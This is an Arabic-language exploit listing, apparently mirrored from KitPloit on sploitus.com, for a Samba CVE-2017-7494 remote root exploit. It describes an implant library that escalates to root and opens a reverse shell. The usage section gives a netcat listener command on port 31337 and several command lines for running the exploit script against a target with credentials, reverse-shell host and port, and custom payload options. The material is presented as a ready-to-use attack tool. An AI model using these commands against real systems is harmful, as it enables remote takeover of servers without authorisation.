## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JOXEANKORET-CVE-2017-7494
# CVE-2017-7494
استغلال يمنح صلاحيات الجذر عن بُعد لثغرة SAMBA CVE-2017-7494.
## التفاصيل
ينقسم هذا الاستغلال إلى جزأين:
* أولاً، يقوم بتجميع حمولة تُسمى "implant.c" وينشئ مكتبة (libimplantx32.so أو libimplantx64.so) تقوم بالتبديل إلى مستخدم الجذر، والانفصال عن العملية الأم، وتشغيل شل عكسي.
* ثانياً، يبحث عن مشاركة قابلة للكتابة في المضيف الهدف المحدد، ويرفع المكتبة باسم عشوائي ويحاول تحميلها.
طالما أن الهدف معرّض للثغرة والحمولة مناسبة لنظام التشغيل والمعمارية للهدف، فإن الاستغلال موثوق بنسبة 100%.
## طريقة الاستخدام
على جهازك، شغّل الأمر التالي:
root@kitploit:~
$ nc -p 31337 -l
ثم شغّل الاستغلال ضد هدفك وانتظر حتى يتصل مرة أخرى بـ Netcat الخاص بك:
root@kitploit:~
$ python cve_2017_7494.py -t target_ip
إذا أغلقت الشل العكسي بسرعة كبيرة، فبدلاً من إعادة تشغيل الاستغلال لرفع الوحدة، إلخ... يمكنك ببساطة تمرير مسار الوحدة التي تم رفعها مسبقًا. بافتراض أنه تم رفعها إلى /shared/directory/ باسم "module.so"، يمكنك تشغيل أمر مثل الأمر التالي:
root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
## تحديث 11/25/2017 - Archivaldo
يمكنك الآن تشغيل الاستغلال ضد samba 3.5.0 و3.6.0، فقط تحتاج إلى إضافة الوسيط -o 1
root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
يمكنك الآن استخدام ملف .so المخصص الخاص بك:
root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
إذا احتجت إلى تشغيل هذا السكربت من جهاز x86، فإن تجميع ملفات implant الثنائية سينشئ ملفين x86. باستخدام الخيار -n 1 يمكنك تعطيل التجميع ونسخ libimplantx64.so من جهاز آخر.
root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
إذا كان samba يعمل فقط على المنفذ 139. يمكنك ضبط منفذ الخادم البعيد باستخدام الوسيط -p
root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
## ملاحظات
لم أعد أدعمه بعد الآن.
\-- Joxean Koret